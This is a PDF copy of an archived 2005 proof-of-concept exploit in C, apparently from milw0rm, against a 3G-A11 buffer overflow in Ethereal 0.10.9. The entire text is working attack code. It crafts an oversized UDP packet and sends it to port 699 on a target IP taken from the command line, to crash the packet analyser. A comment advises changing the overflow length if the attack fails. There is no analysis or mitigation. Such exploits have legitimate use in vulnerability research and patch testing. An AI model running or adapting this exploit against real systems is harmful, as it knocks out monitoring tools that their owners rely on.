Ethereal 0.10.9 Denial of Service.pdf

1 2 /* 3 * 4 * Ethereal 3G−A11 remote buffer overflow PoC exploit 5 * −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 6 * Coded by Leon Juranic <ljuranic@lss.hr> 7 * LSS Security <http://security.lss.hr/en/> 8 * 9 */ 10 11 #include <stdio.h> 12 #include <sys/socket.h> 13 #include <sys/types.h> 14 #include <sys/stat.h> 15 #include <netinet/in.h> 16 #include <arpa/inet.h> 17 #include <netdb.h> 18 19 20 main (int argc, char **argv) 21 { 22 int sock; 23 struct sockaddr_in sin; 24 unsigned char buf[1024]; 25 char bla[200]; 26 27 sock=socket(AF_INET,SOCK_DGRAM,0); 28 29 sin.sin_family=AF_INET; 30 sin.sin_addr.s_addr = inet_addr(argv[1]); 31 sin.sin_port = htons(699); 32 33 buf[0] = 22; 34 memset(buf+1,’A’,19); 35 buf[20] = 38; 36 *(unsigned short*)&buf[22] = htons(100); 37 *(unsigned short*)&buf[28] = 0x0101; 38 buf[30] = 31; 39 buf[31] = 150; // len for overflow...play with this value if it doesn’t work 40 41 memset (bla,’B’,200); 42 strncpy (buf+32,bla,180); 43 44 sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr)); 45 } 46 47 // milw0rm.com [2005−03−08] Page 1/1 Ethereal 0.10.9 Denial of Service Leon Juranic 03/08/2005